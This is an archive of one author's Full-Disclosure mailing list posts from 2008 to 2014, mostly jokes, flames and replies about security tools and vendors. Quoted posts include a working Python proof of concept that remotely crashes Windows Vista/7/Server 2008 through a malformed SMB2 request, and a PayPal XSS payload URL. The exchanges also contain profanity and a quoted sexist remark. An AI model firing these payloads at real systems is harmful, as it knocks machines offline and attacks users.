from:"Randal T. Rioux"

Re: [Full-disclosure] [SPAM] Re: Ektron CMS TakeOver Part (2) - PaylPal-Forward.com demonstration

2014-02-05 Thread Randal T. Rioux

On 2/4/2014 6:36 PM, Mark Litchfield wrote:
 On 2/4/2014 3:13 PM, security curmudgeon wrote:
 :  This is not the behavior of the site as of 48 hours ago.

 : Let me check.  Normal registration should also be available ? Infact I
 : will remove the registration.
 :
 : The purpose of this whole registration in the first place was to allow
 : for future postings I am going to make later this week that would only
 : be available to registered users.  Not necessarily vulnerabilities, but
 : useful stuff for pentesting.  Also all registered users would be
 given
 : a 48 hours head start on any new vulnerabilities that I post in the
 : future.

 Which is great, but I strongly recommend you allow a site-specific
 registration for such purposes. Giving up one of the two dominant social
 media accounts for it is excessive.

 I should add, I am all for constructive criticism.  But a public forum
 is not really the place.  Feel free to email me directly.

Yes, it is. This is a security forum. Your authentication mechanism is a
major security issue.

The damn thing should get its own CVE.

Think about it and you'll see the point.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7

2011-08-28 Thread Randal T. Rioux

On 8/28/2011 6:52 PM, Juan Sacco wrote:

 This isnt a company making a big product, Im doing this because I like 
 doing it.

Good for you. I think that is great. But you are pretending to be a big
company. Stop that.

I am happy to see you removed that silly donation-for-download scheme.

 I'm not forcing you to use my software, if you don't like it please 
 don't waste bandwith on it.

Fantastic advice.

 We are working on a JAVA version in order to support multi-plataform, 
 and because I really like to JAVA

I did too, until I learned how to program. Oracle's purchase/murder also
hastened my departure.

Might I suggest C++/Qt? :-)

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] International Master In Computer Security and Cyberwarfare

2011-05-26 Thread Randal T. Rioux

How can you expect to be taken seriously when your Web site doesn't have
pictures of attractive, multi-ethnic women in business attire pointing
at holographic displays of random binary digits?

Bah!

Randy


On 5/23/2011 10:10 AM, Mastere NIS wrote:
 Our master “/Network and Information security/” (NIS) program is a
 springboard to a variety of exciting careers in security information
 ranging from computer network administrator, IT security expert or
 cyberwarfare expert for the Department of Defense to security officer in
 charge of the IT security in an international firm.
 
 Through theoretical and practical study, the NIS program will provide
 you with the skills and knowledge you need to work in today’s fast
 moving information security landscape. It is the only program of this
 kind in France as it offers a different and new approach to information
 security by considering the attacker’s view point. This program also
 offers you insight into advanced study options such as active auditing
 or cyber warfare techniques and concepts, helping you to choose your
 career path. Our program emphasizes hands-on, practical training
 providing you with an additional learning opportunity that is
 best-suited for real world demands.
 
 The Specialized Master “NIS” is a Post-master professional degree
 called in French “mastère spécialisé”. It is a very specialized and
 highly technical one-year study course taught in English. This program
 is aimed at international students with a bachelor’s Degree or
 equivalent in the following related fields: computer science, computer
 engineering, applied mathematics. It is opened to higher level students
 and experienced engineers in IT as well.
 
 More information on the homepage
 https://sites.google.com/site/esieanismaster/of the International Master.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Stuxnet

2011-05-01 Thread Randal T. Rioux

On 05/01/2011 01:38 PM, satyam pujari wrote:

 *request* Hello FD, Can anyone handle this guy please ?

Allow me to spin this broken record again...

Censorship = Bad
E-Mail Filters = Good

Take control of your inbox and don't rely on others!

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SSL Capable NetCat and more

2011-03-30 Thread Randal T. Rioux

On 3/27/2011 4:29 PM, Dan Tulovsky wrote:
 Beside that, scnc is written in pure-Perl, and is easily modifiable
 by anyone. Such really simple (dumb?) stuff should not be written in
 low-level languages such as C.
 
 You can't be serious...

Shirley, he is.

Perl is shite. It's a dependency hell, it lacks the logic of C/C++ and
is interpreted (as pointed out by others). Any code base can be
modifiable by anyone - as long as it is open sourced.

Don't get me wrong, I'm not criticizing the product. I think reinventing
the wheel in lesser performing methods is great. Just don't disregard C.
To be honest, in my code auditing days, it was SO much easier to find
flaws in C/C++ than Perl, because Perl is just messy and ugly. Something
looks wrong, but it's right. Uggh!

But if you need to write something quick for an easy task, by all means,
hit the Perl.

It's like using Java to write large scale enterprise products. Who the
hell? Why? Portability is nice, but performance is better. Java belongs
in the small-scale realm of applications.

Grumble grumble. Get off my lawn. Back to the lair :-)

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Your email message was blocked

2011-03-30 Thread Randal T. Rioux

On 3/30/2011 11:31 PM, r...@bellaliant.ca wrote:
 The following email message was *blocked* by Bell Aliant Content
 Filtering Device:
   
*From:*  ra...@procyonlabs.com
*To:*peter.mo...@bellaliant.ca
*Subject:*   Re: [Full-disclosure] SSL Capable NetCat and more
*Message:*   B4d93f5990001.0001.0003.mml
 
 Because it may contain *unacceptable language*, or *inappropriate
 material*.  Please remove any unacceptable or inappropriate language and
 resend the message.
 
 The blocked email will be automatically deleted after *5 days.
 *
 Content Rule: Policy Management (Inbound) : Block Common  Mild Profanity
 
 r...@bellaliant.ca
 

F**K YOU.

Here's a nickel - get yourself a real mail server.

Randy

-- 
Disclaimer:

By sending an email to ANY of my addresses you are agreeing that:

1. I am, by definition, the intended recipient
2. All information in the email is mine to do with as I see fit
3. I will take the contents as representing the views of your company
4. If your email is an Out of Office reply on a mailing list, I will
social engineer your company
5. This notification overrides any disclaimer or statement of
confidentiality that may be included on your message

Further, you understand that if any of the following conditions are met
that you are indeed, a bag of douche:

1. Your message identifies the device you sent it from
2. You messed up the thread by top-posting

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread Randal T. Rioux

On 3/29/2011 9:13 PM, runlvl wrote:
 Insecurity Research is happy to announce the release of version 2.5,
 get it now while is still hot !
 
 Insect Pro 2.5 is a penetration security auditing and testing software
 solution designed to allow organizations of all sizes mitigate,
 monitor and manage the latest security threats vulnerabilities.
 
 We’re always working to improve Insect Pro and now the users obtain
 a new feature: A fully automated active web application security
 reconnaissance tool.
 
 Check it out: http://www.youtube.com/watch?v=ifiyHem7fMA
 
 We invite you to take a visual tour where you can find screenshots and
 videos, visit us now at http://www.insecurityresearch.com
 
 There is no fixed price to get a copy, you can obtain the full version
 by making a minimum donation to keep us coding.
 
 We are really thankful with the community!

I keep getting this error when trying to download:

Please enter an amount greater than zero.

Can you fix that so I can test out the software. I'm really curious
about how much code was lifted from other projects. Nice logo though!

Thanks,
Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread Randal T. Rioux

On 3/29/2011 9:13 PM, runlvl wrote:
 Insecurity Research is happy to announce the release of version 2.5,
 get it now while is still hot !
snip

Oh! And you list the Dept. of Energy as a customer. I used to work
there, and still talk to a lot of the security offices for various
locations. They've never heard of it.

Also, did you get clearance from the DoE's Office of Public Affairs to
list them as a customer? They get touchy about that sort of stuff.

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown

2011-02-15 Thread Randal T. Rioux

Thought this would be appropriate :-)

http://xkcd.com/149/

On 2/15/2011 4:00 PM, Eyeballing Weev wrote:
 What do you expect from a woman?
 
 Rebecca, kindly make me a sandwich
 
 On 02/15/2011 03:44 PM, Cal Leeming [Simplicity Media Ltd] wrote:
 I did apologise, no need to drag it out into the yard and beat it with a
 stick lol.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] OpenBSD Paradox

2010-12-15 Thread Randal T. Rioux

On 12/15/2010 5:00 PM, BMF wrote:
 2010/12/15 musnt live musntl...@gmail.com:
 What is this time to stop the press!
 
 This fake broken English schtick is really stupid and annoying. Knock
 it off. In the meantime you are kill filed. I suggest everyone else do
 the same as nothing useful has ever come of this person.

First, obligatory:

http://www.pulledbyakite.com/funnypics/s_troll.jpg

Second, if you can't take a joke:

http://www.pulledbyakite.com/funnypics/gtfoti.png

Now let's hug and move on.

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows is 100% self-modifying assembly code?(Interesting security theory)

2010-12-10 Thread Randal T. Rioux

On 12/10/2010 10:10 AM, John Horn wrote:
 Is this a joke?
 
 
 --
 
 John Horn
 
 City of Tucson, IT Department
 
 Network Services (Network security)
 
 Phone: (520) 837-6036
 
 --
 
 CONFIDENTIALITY NOTICE: If you have received this email in error,
 please immediately notify
 
 the sender by e-mail at the address shown.  This email transmission
 may contain confidential information.
 
 This information is intended only for the use of the individual(s) or
 entity to whom it is intended even if addressed incorrectly.
 
 Please delete it from your files if you are not the intended
 recipient.  Thank you for your compliance, time and attention to this
 matter.
snip

A top-post, bogus legal notice AND an office phone #.

Social engineers - unite!

Might want to think about that a little.

And if you have to ask whether something is a joke, then the troll was
successful.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Paypal XSS Vulnerability - Resolved

2010-03-27 Thread Randal T. Rioux

I find it humorous that an organization that pretends to be a bank and
regularly steals money from its members has the balls to distribute a
PayPal Responsible Disclosure Policy.

Good luck with that.

Randy

On Fri, March 26, 2010 10:49 pm, Orbeton, Jon wrote:
All:

The XSS vulnerability reported below was addressed at approximately 17:45
PDT today.

For information about how to report security issues to PayPal, please
refer to the PayPal Responsible Disclosure Policy documented here:
https://www.paypal.com/cgi-bin/webscr?cmd=xpt/cps/securitycenter/general/ReportingSecurityIssues-outside

Site security issues should be reported to:
sitesecur...@paypal.com

All reports will be handled professionally and quickly. A PGP key is
available at the URL above.

Thanks,
Jon Orbeton

PayPal, an eBay Company

From: Wesley Kerfoot wjak56 () gmail com
Date: Fri, 26 Mar 2010 15:46:09 -0400

Paypal is affected by an XSS vulnerability where it fails to validate
input for the following url:

https://www.paypal.com/xclick/business=

One can add arbitrary javascript with no need for any filter evasion.

https://www.paypal.com/xclick/business=script alert(xss);
/script

As far as I know only the above url is affected. All of the usual XSS
attacks will work with this.

Cheers.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SecurityFocus to partially shut down

2010-03-12 Thread Randal T. Rioux

On Fri, March 12, 2010 1:45 pm, Michal Zalewski wrote:
 http://www.securityfocus.com/news/11582

 While the news portal section of SecurityFocus will no longer be
 offered, we think our readers will be better served by this change as
 we combine our efforts with Symantec Connect and continue to provide a
 valuable service to the community.

 http://www.symantec.com/connect/

 In other words, RIP :-/

Who didn't see this coming?

Symantec... OM NOM NOMMING companies since 1984.

Randy


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] How I become Vice President of Security at Yahoo! 1999-2005.

2010-02-19 Thread Randal T. Rioux

Decent attempt at trolling. Some beginner mistakes, but the message was
relayed as intended (I'm sure). Comments inline.

On Fri, February 19, 2010 6:45 pm, John Q Public wrote:
 -BEGIN PGP SIGNED MESSAGE- Hash: SHA1

 Greetings.

 I've been holding this one back for a while. It's been eating at my skin.

 I was just an intern at the time, but I'd get the mail, copy the text,
 delete his mail, and send the mail to my supervisor, authored by me.

Clarify the type of mail - it adds texture to the troll.

 I still remember the friendships I made at Yahoo. The cute girlfriends I
 have and how it changed my life. I remember I was just some office kid
 opening up emails in outlook 2000. But I risen to be so much more. This
 mysterious person helped me do it.

Perhaps some reflection on the type of assistance? Also, Yahoo! employees
do not have cute girlfriends.

 Eventually, I was promoted up Vice President of Security at Yahoo! and
 made nearly six figures a year.

The salary figure is off. Take into consideration the role, size of
organization and geographical location. Then again, the experience you
detailed would possibly justify this low figure.

 This is what I did. And I told no one. All I know is there is a kid whose
 advice I took credit for and he is the key factor for my success in life.

 I live in a $500k condo in Mountain View. Wife, 2 kids, and a Lexus (2009
 Hybrid, Italian leather seats, TV in backseat for the kids).

That amount in Mountain View would get you 20x20 in someone's basement.
Also, they don't make seats with the skin of Italian people. Some ethical
thing.

 I just wanted to let you know that the security tips helped. I feel
 pretty guilty for flat out taking credit for all his work though. I just
 had to get it off my chest.

 Thank you so much, if you read this list. You've touched my life.

 -BEGIN PGP SIGNATURE- Charset: UTF8 Note: This signature can be
 verified at https://www.hushtools.com/verify Version: Hush 3.0

Hmm. Must be legit. It's signed!

Okay, break time is over. Back to code monkeying.

Randy


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Peiter Mudge Zatko petition to be named U.S. Cybersecurity Chief

2009-09-17 Thread Randal T. Rioux

The Sp3ctacle wrote:
 http://www.ipetitions.com/petition/mudge4cyberczar/index.html
 
 This petition is posted in support for the nomination of Peiter Zatko
 (aka mudge) to the President's post of Cybersecurity Chief. We've all
 seen how effective past efforts have been regarding this initiative,
 and realize the importance of nominating someone who understands not
 only all facets of cybersecurity, but has garnered the respect of both
 peers and adversaries in the space. Dr. Zatko's bio is available at:
 http://en.wikipedia.org/wiki/P... and
 http://www.allbusiness.com/gov...

Yeah, because if it is one thing he wants, it is a powerless figurehead 
position of bureaucracy and politics.

There is a reason why nobody stays in the high level (US) information 
security roles for long.

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-14 Thread Randal T. Rioux

It's fun :-)

On Mon, September 14, 2009 12:14 pm, D-vice wrote:
You wrote an exploit in java

*head explodes*

On Mon, Sep 14, 2009 at 6:02 AM, Randal T. Rioux
ra...@procyonlabs.comwrote:

After testing my version of the exploit (using Java instead of Python) I
tried it against a Windows Server 2008 R2 installation - it went down.

http://www.procyonlabs.com/software/smb2_bsoder

Randy

laurent gaffie wrote:
Advisory updated :

=
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: High
=

I. VULNERABILITY
-
Windows Vista, Server 2008 R2, 7 RC :
SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

II. BACKGROUND
-
Windows vista and newer Windows comes with a new SMB version named
SMB2.
See:

http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.

III. DESCRIPTION
-
[Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS
patch, for another SMB2.0 security issue:
KB942624 (MS07-063)
Installing only this specific update on Vista SP0 create the following
issue:

SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
PROTOCOL REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to
a
SMB server, and it's used to identify the SMB dialect that will be
used
for futher communication.

IV. PROOF OF CONCEPT
-

Smb-Bsod.py:

#!/usr/bin/python
#When SMB2.0 recieve a char in the Process Id High SMB header
field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket

host = IP_ADDR, 445
buff = (
\x00\x00\x00\x90 # Begin SMB header: Session message
\xff\x53\x4d\x42 # Server Component: SMB
\x72\x00\x00\x00 # Negociate Protocol
\x00\x18\x53\xc8 # Operation 0x18 sub 0xc853
\x00\x26# Process ID High: -- :) normal value should be \x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe
\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54
\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31
\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00
\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57
\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61
\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c
\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c
\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e
\x30\x30\x32\x00
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

V. BUSINESS IMPACT
-
An attacker can remotly crash any Vista/Windows 7 machine with SMB
enable.
Windows Xp, 2k, are NOT affected as they dont have this driver.

VI. SYSTEMS AFFECTED
-
[Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server
2008
R2, Windows 7 RC.

VII. SOLUTION
-
No patch available for the moment.
Close SMB feature and ports, until a patch is provided.
Configure your firewall properly
You can also follow the MS Workaround:
http://www.microsoft.com/technet/security/advisory/975497.mspx

VIII. REFERENCES
-
http://www.microsoft.com/technet/security/advisory/975497.mspx

http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx

IX. CREDITS
-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com http://gmail.com

X. REVISION HISTORY
-
September 7th, 2009: Initial release
September 11th, 2009: Revision 1.0 release

XI. LEGAL NOTICES
-
The information contained within this advisory is supplied as-is
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

XII.Personal Notes
-
Many persons have suggested to update this advisory for RCE and not
BSOD:
It wont be done, if they find a way to execute code, they will publish
them advisory.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-14 Thread Randal T. Rioux

Scratch that - the version of 2008 I had wasn't an official R2 release. So
original reports still hold. It didn't crash my R2 build 7600.

Laurent, et al, has this been tried against an Itanium machine? Just
curious. Nobody at work will let me test the exploit against their Itanium
servers.

Randy

On Mon, September 14, 2009 12:02 am, Randal T. Rioux wrote:
After testing my version of the exploit (using Java instead of Python) I
tried it against a Windows Server 2008 R2 installation - it went down.

http://www.procyonlabs.com/software/smb2_bsoder

Randy

laurent gaffie wrote:
Advisory updated :

=
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: High
=

I. VULNERABILITY
-
Windows Vista, Server 2008 R2, 7 RC :
SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

II. BACKGROUND
-
Windows vista and newer Windows comes with a new SMB version named SMB2.
See:
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.

SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
PROTOCOL REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a
SMB server, and it's used to identify the SMB dialect that will be used
for futher communication.

IV. PROOF OF CONCEPT
-

Smb-Bsod.py:

#!/usr/bin/python
#When SMB2.0 recieve a char in the Process Id High SMB header
field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket

V. BUSINESS IMPACT
-
An attacker can remotly crash any Vista/Windows 7 machine with SMB
enable.
Windows Xp, 2k, are NOT affected as they dont have this driver.

VI. SYSTEMS AFFECTED
-
[Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008
R2, Windows 7 RC.

VIII. REFERENCES
-
http://www.microsoft.com/technet/security/advisory/975497.mspx
http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx

IX. CREDITS
-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com http://gmail.com

X. REVISION HISTORY
-
September 7th, 2009: Initial release
September 11th, 2009: Revision 1.0 release

XII.Personal Notes
-
Many persons have suggested to update this advisory for RCE and not
BSOD:
It wont be done, if they find a way to execute code, they will publish
them advisory.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-13 Thread Randal T. Rioux

After testing my version of the exploit (using Java instead of Python) I
tried it against a Windows Server 2008 R2 installation - it went down.

http://www.procyonlabs.com/software/smb2_bsoder

Randy

laurent gaffie wrote:
Advisory updated :

=
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: High
=

I. VULNERABILITY
-
Windows Vista, Server 2008 R2, 7 RC :
SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
PROTOCOL REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a
SMB server, and it's used to identify the SMB dialect that will be used
for futher communication.

IV. PROOF OF CONCEPT
-

Smb-Bsod.py:

#!/usr/bin/python
#When SMB2.0 recieve a char in the Process Id High SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket

V. BUSINESS IMPACT
-
An attacker can remotly crash any Vista/Windows 7 machine with SMB enable.
Windows Xp, 2k, are NOT affected as they dont have this driver.

VI. SYSTEMS AFFECTED
-
[Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008
R2, Windows 7 RC.

VIII. REFERENCES
-
http://www.microsoft.com/technet/security/advisory/975497.mspx
http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx

IX. CREDITS
-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com http://gmail.com

X. REVISION HISTORY
-
September 7th, 2009: Initial release
September 11th, 2009: Revision 1.0 release

XII.Personal Notes
-
Many persons have suggested to update this advisory for RCE and not BSOD:
It wont be done, if they find a way to execute code, they will publish
them advisory.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Slashdot hacked?

2009-07-23 Thread Randal T. Rioux

On Thu, July 23, 2009 5:47 pm, Compsec Guy wrote:

 What's wrong with Slashdot today?

Nothing.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Black Hat USA Videos available to D/L

2009-04-02 Thread Randal T. Rioux

On Mon, March 30, 2009 8:14 pm, jmoss wrote:

 Hey Full Disclosure,

 I am proud to announce that the audio and video from BH USA 2008 is now
 available for free download, and is in several formats, the first of which
 is a large, hi-res format with video-sync speaker and presentation:
 https://www.blackhat.com/html/bh-usa-08/bh-usa-08-archive.html
snip

.m4v? Really? Oh Jeff. Nobody uses Macs. We like software freedom. Come
back to the DC-stuff mailing list so we can discuss this :-)

Off to start converting videos...

Randy


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft takes 7 years to 'solve' a problem?!

2008-11-25 Thread Randal T. Rioux

On Tue, November 25, 2008 1:44 am, Memisyazici, Aras wrote:
SSNNIIPP
 OK... Maybe I'm going a bit extreme, but WTH?! Am I the only one who is
 interpreting this, this way? Really? When has releasing a solution to a
 problem 7 years later ever been acceptable?

May not be acceptable, but it is standard practice with some software
companies.

They're not closed-source because they care about security. They're
closed-source because they're lazy (and/or don't care about anything but
quick money).

Randy


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] n3td3v not a troll

2008-09-15 Thread Randal T. Rioux

On Mon, September 15, 2008 1:08 pm, n3td3v wrote:
 On Mon, Sep 15, 2008 at 5:49 PM,  [EMAIL PROTECTED] wrote:
 On Mon, 15 Sep 2008 08:09:12 BST, n3td3v said:
 n3td3v is outspoken but hes not a troll. he is a serious security
 researcher with his own mailing list.

 ...

 and then someone hurtfully says im a troll, what does this mean?

 It means that if you don't understand what a troll is,

 It means posting inflammatory comments on purpose to get a response, yet
 i've never done this ever, So I can't be a troll, because I've never
 purposely set out to post something just to get a reaction. Anything I
 say is my actual opinion, so accept it or unsubscribe.

It is Full-Disclosure, not Opinion-Disclosure.

Sure, you can do it. Just expect the appropriate responses.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] security news on cnet???

2008-09-02 Thread Randal T. Rioux

On Tue, Sep 2, 2008 at 11:07 AM, n3td3v [EMAIL PROTECTED] wrote:

 you've not post any security news all week, what's going on cnet??? is
 the journalist that does the security news off ill???

 :(

 yours,

 cnet fan

surely they will cave to pressure from the global powers of the netdev
group. i bet they'll be a story up for comment pretty soon now.

randy


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] DIE IN A FIRE post

2008-08-27 Thread Randal T. Rioux

On Wed, August 27, 2008 11:34 am, Simon Smith wrote:
 Hi Mike,
   Next time you decide to say something stupid make sure that you do it
 anonymously.

 Michael C Shirk

 Home:
 4205 Chapel Gate Pl
 Belcamp, MD 21017-1636
 (410) 273-1377

 M. Shirk wrote:
 DIE IN A FIRE !!!1!1!

 Shirkdog
 ' or 1=1--
 http://www.shirkdog.us

Simon:

A: Because it messes up the order in which people normally read text.
Q: Why is top-posting such a bad thing?
A: Top-posting.
Q: What is the most annoying thing in e-mail?

Shirkdog:

Seems we share a state. Ask the evil hacker Simon for my address - come on
over. I'll back a cake.

Randy


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] simple phishing fix

2008-07-29 Thread Randal T. Rioux

On Tue, July 29, 2008 2:31 pm, [EMAIL PROTECTED] wrote:
 You might eliminate phishing but there are occasionally messages from
 people at these institutions also. This sort of thing is in essence
 allowing phishers a denial of service attack against anyone they choose
 to make themselves a nuisance with.

 I am not well pleased with any bank authentication I have seen so far
 personally; seems to me finance-related messages should be authenticated
 both ways and preferably a confirming authentication to demonstrate the
 subject agrees with the transaction should be done before such are
 accepted. That kind of thing would be hard to spoof and if done right
 pretty useless to someone who could record entire transactions.

 As for email, judge by its content. This posting for example will do
 nothing to your money, sells you nothing. Nor does it ask any information
 of you. If it were spoofed it would be harmless.

 Glenn Everhart


But it is from Chase and nothing good comes from Chase ;-)


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Panda ActiveScan 2.0 remote code execution

2008-07-04 Thread Randal T. Rioux

On Fri, July 4, 2008 7:02 am, Panda Security Response wrote:
 Please allow at least one week for us to respond before public
 disclousure. We only received this information a few days ago.

 Regards,

 -- Pedro Bustamante Senior
 Research Advisor Panda Security

It takes a week to hit the respond button? At least be polite and read
your mail, perhaps with a quick stand by, we're looking into it response
so folks think you care.

We are an impatient lot in this community.



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Snort Signature to detect credit cards

2008-05-09 Thread Randal T. Rioux

FYI - http://www.emergingthreats.net

This was discussed on the snort-sigs mailing list back in 2003. Check out
http://marc.info/?l=snort-sigsm=106601612825950w=2

Also, as Ray mentioned, the Emerging Threats emerging-policy.rules
contains some PCRE CC# checks. This will show you some:

$ more emerging-policy.rules | grep Number


Randy


On Thu, May 8, 2008 11:02 pm, Simon Smith wrote:
 You sure you got that URL right?

 Ray P wrote:
 The free rule sets from http://www.emergingthreats.com have this
 capability. Look in the Policy section.

 RAy

 
 From: [EMAIL PROTECTED]
 To: full-disclosure@lists.grok.org.uk
 Date: Thu, 8 May 2008 12:44:15 -0600
 Subject: [Full-disclosure] Snort Signature to detect credit cards


 Does anyone have a snort signature to detect credit cards or social
 security numbers?

 Thank you in advance,

 Jeff


 
 Get Free (PRODUCT) RED Emoticons, Winks and Display Pics. Check it out!
 http://joinred.spaces.live.com?ocid=TXT_HMTG_prodredemoticons_052008


 

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


 --

 - simon

 --
 http://www.snosoft.com

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Out of Office AutoReply: Snort Signature to det ect credit cards

